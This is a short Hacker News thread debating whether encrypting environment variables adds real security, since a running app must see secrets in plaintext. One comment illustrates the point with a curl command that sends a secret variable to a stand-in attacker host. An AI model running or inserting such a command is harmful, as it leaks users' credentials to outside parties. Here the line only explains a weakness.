alt Hacker NewsHow do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.
What's best practice to handle env vars? How do poeple handle them "securely" without it just being security theater? What tools and workflows are people using?
Replies
ErroneousBosh • today at 8:27 AM
Exactly. How do you play back the encrypted DVD without having the decryption key right there on the player for everyone to find?
➕ show 1 reply
cuki288 • today at 9:58 AM
[dead]
Yeah that's a good point. Dotenvx seems to claim a solution but I'm not smart enough to make sense of it.
However I do feel now like my sensitive things are better off deployed on a VPS where someone would need a ssh exploit to come at me.